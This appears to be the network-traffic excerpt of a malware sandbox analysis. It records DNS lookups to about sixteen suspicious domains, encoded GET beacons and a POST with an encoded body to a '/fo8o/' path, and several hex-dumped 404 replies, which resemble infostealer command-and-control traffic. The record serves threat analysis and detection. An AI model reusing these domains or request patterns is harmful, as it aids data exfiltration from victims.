Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKfAZWzpPAGosIZrfQfUSvJErRFr5z6zwQDc//Mk8r+NzcRQ==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.empowermedeco.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
Source: global traffic	HTTP traffic detected: GET /fo8o/?7Fp=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1aOjYc66J7Y/iHKqqtd6zR7stgJ4hm8X7oMbvduFmUyU2g==&HN4=EPU0u4nHA HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8Accept-Language: en-US,enHost: www.3xfootball.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)

Source: global traffic	DNS traffic detected: DNS query: www.3xfootball.com
Source: global traffic	DNS traffic detected: DNS query: www.kasegitai.tokyo
Source: global traffic	DNS traffic detected: DNS query: www.goldenjade-travel.com
Source: global traffic	DNS traffic detected: DNS query: www.antonio-vivaldi.mobi
Source: global traffic	DNS traffic detected: DNS query: www.magmadokum.com
Source: global traffic	DNS traffic detected: DNS query: www.rssnewscast.com
Source: global traffic	DNS traffic detected: DNS query: www.liangyuen528.com
Source: global traffic	DNS traffic detected: DNS query: www.techchains.info
Source: global traffic	DNS traffic detected: DNS query: www.elettrosistemista.zip
Source: global traffic	DNS traffic detected: DNS query: www.donnavariedades.com
Source: global traffic	DNS traffic detected: DNS query: www.660danm.top
Source: global traffic	DNS traffic detected: DNS query: www.empowermedeco.com
Source: global traffic	DNS traffic detected: DNS query: www.joyesi.xyz
Source: global traffic	DNS traffic detected: DNS query: www.k9vyp11no3.cfd
Source: global traffic	DNS traffic detected: DNS query: www.shenzhoucui.com
Source: global traffic	DNS traffic detected: DNS query: www.b301.space

Source: unknown

HTTP traffic detected: POST /fo8o/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,enAccept-Encoding: gzip, deflate, brHost: www.goldenjade-travel.comOrigin: http://www.goldenjade-travel.comCache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 204Referer: http://www.goldenjade-travel.com/fo8o/User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)Data Raw: 37 46 70 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 66 2b 69 68 4b 4e 35 6b 56 6a 42 53 54 58 45 45 48 35 7a 4f 77 6e 61 50 46 49 62 45 35 61 50 52 57 73 55 6b 58 34 3d Data Ascii: 7Fp=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfOf+ihKN5kVjBSTXEEH5zOwnaPFIbE5aPRWsUkX4=

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 11 Jan 2025 03:05:56 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 11 Jan 2025 03:06:20 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 11 Jan 2025 03:06:22 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 11 Jan 2025 03:06:25 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Sat, 11 Jan 2025 03:06:28 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:17 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:19 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:22 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:24 GMTServer: ApacheContent-Length: 493Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 2f 65 59 64 6d 64 58 77 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2e 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 75 6d 62 65 72 22 3e 34 30 34 3c 2f 64 69 76 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 65 78 74 22 3e 3c 73 70 61 6e 3e 4f 6f 6f 70 73 2e 2e 2e 3c 2f 73 70 61 6e 3e 3c 62 72 3e 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 64 69 76 3e 0a 3c 61 20 63 6c 61 73 73 3d 22 6d 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 64 65 70 65 6e 2e 69 6f 2f 75 7a 63 68 6f 5f 2f 70 65 6e 73 2f 70 6f 70 75 6c 61 72 2f 3f 67 72 69 64 5f 74 79 70 65 3d 6c 69 73 74 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 3c 2f 61 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 20 2d 2d 3e 0a 20 20 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>CodePen - 404</title> <link rel='stylesheet' href='https://codepen.io/uzcho_/pen/eYdmdXw.css'><link rel="stylesheet" href="./style.css"></head><body><!-- partial:index.partial.html --><div class="number">404</div><div class="text"><span>Ooops...</span><br>page not found</div><a class="me" href="https://codepen.io/uzcho_/pens/popular/?grid_type=list" target="_blank"></a><!-- partial --> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 11 Jan 2025 03:08:30 GMTServer: ApacheContent-Length: 203Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 66 6f 38 6f 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /fo8o/ was not found on this server.</p></body></html>
